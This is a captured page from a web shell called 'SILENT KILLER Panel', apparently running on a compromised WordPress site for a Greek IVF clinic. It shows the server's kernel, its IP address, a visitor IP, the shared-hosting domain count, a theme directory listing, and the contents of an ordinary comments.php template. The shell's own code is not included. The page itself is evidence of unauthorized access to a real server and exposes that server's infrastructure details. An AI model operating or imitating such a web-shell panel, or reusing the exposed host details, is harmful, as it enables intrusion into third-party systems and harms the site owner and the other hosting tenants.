SILENT KILLERPanel

Current Path: > home > ivftiowh > greeceivf.com > > wp-content > > themes > twentyseventeen


Operation   : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software     : Apache
Server IP    : 185.61.154.216 | Your IP: 216.73.216.44
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/ivftiowh/greeceivf.com//wp-content//themes/twentyseventeen

NameTypeSizeLast ModifiedActions
assets Directory - -
inc Directory - -
template-parts Directory - -
.htaccess File 160 bytes July 30 2024 02:32:51.
404.php File 936 bytes May 17 2024 00:13:47.
archive.php File 1761 bytes November 01 2016 17:26:32.
comments.php File 2351 bytes December 16 2016 22:08:47.
footer.php File 1298 bytes April 18 2017 09:14:46.
front-page.php File 1511 bytes January 12 2018 20:09:41.
functions.php File 18793 bytes October 04 2017 23:53:47.
header.php File 1868 bytes August 15 2024 18:23:56.
html5.css File 6395 bytes July 05 2024 17:05:10.
index.php File 2076 bytes November 01 2016 17:26:32.
page.php File 965 bytes October 23 2016 12:29:30.
rtl.css File 9643 bytes May 02 2018 22:15:25.
screenshot.png File 363833 bytes October 20 2016 04:12:31.
search.php File 1963 bytes November 01 2016 17:26:32.
searchform.php File 948 bytes December 16 2016 22:08:47.
sidebar.php File 505 bytes October 02 2017 22:04:46.
single.php File 1604 bytes December 16 2016 22:08:47.
slider.css File 57 bytes August 21 2024 00:47:27.
style.css File 83401 bytes August 02 2018 16:43:30.

Reading File: /home/ivftiowh/greeceivf.com//wp-content//themes/twentyseventeen/comments.php

<?php
/**
 * The template for displaying comments
 *
 * This is the template that displays the area of the page that contains both the current comments
 * and the comment form.
 *
 * @link https://codex.wordpress.org/Template_Hierarchy
 *
 * @package WordPress
 * @subpackage Twenty_Seventeen
 * @since 1.0
 * @version 1.0
 */

/*
 * If the current post is protected by a password and
 * the visitor has not yet entered the password we will
 * return early without loading the comments.
 */
if ( post_password_required() ) {
	return;
}
?>

<div id="comments" class="comments-area">

	<?php
	// You can start editing here -- including this comment!
	if ( have_comments() ) : ?>
		<h2 class="comments-title">
			<?php
			$comments_number = get_comments_number();
			if ( '1' === $comments_number ) {
				/* translators: %s: post title */
				printf( _x( 'One Reply to &ldquo;%s&rdquo;', 'comments title', 'twentyseventeen' ), get_the_title() );
			} else {
				printf(
					/* translators: 1: number of comments, 2: post title */
					_nx(
						'%1$s Reply to &ldquo;%2$s&rdquo;',
						'%1$s Replies to &ldquo;%2$s&rdquo;',
						$comments_number,
						'comments title',
						'twentyseventeen'
					),
					number_format_i18n( $comments_number ),
					get_the_title()
				);
			}
			?>
		</h2>

		<ol class="comment-list">
			<?php
				wp_list_comments( array(
					'avatar_size' => 100,
					'style'       => 'ol',
					'short_ping'  => true,
					'reply_text'  => twentyseventeen_get_svg( array( 'icon' => 'mail-reply' ) ) . __( 'Reply', 'twentyseventeen' ),
				) );
			?>
		</ol>

		<?php the_comments_pagination( array(
			'prev_text' => twentyseventeen_get_svg( array( 'icon' => 'arrow-left' ) ) . '<span class="screen-reader-text">' . __( 'Previous', 'twentyseventeen' ) . '</span>',
			'next_text' => '<span class="screen-reader-text">' . __( 'Next', 'twentyseventeen' ) . '</span>' . twentyseventeen_get_svg( array( 'icon' => 'arrow-right' ) ),
		) );

	endif; // Check for have_comments().

	// If comments are closed and there are comments, let's leave a little note, shall we?
	if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?>

		<p class="no-comments"><?php _e( 'Comments are closed.', 'twentyseventeen' ); ?></p>
	<?php
	endif;

	comment_form();
	?>

</div><!-- #comments -->

SILENT KILLER Tool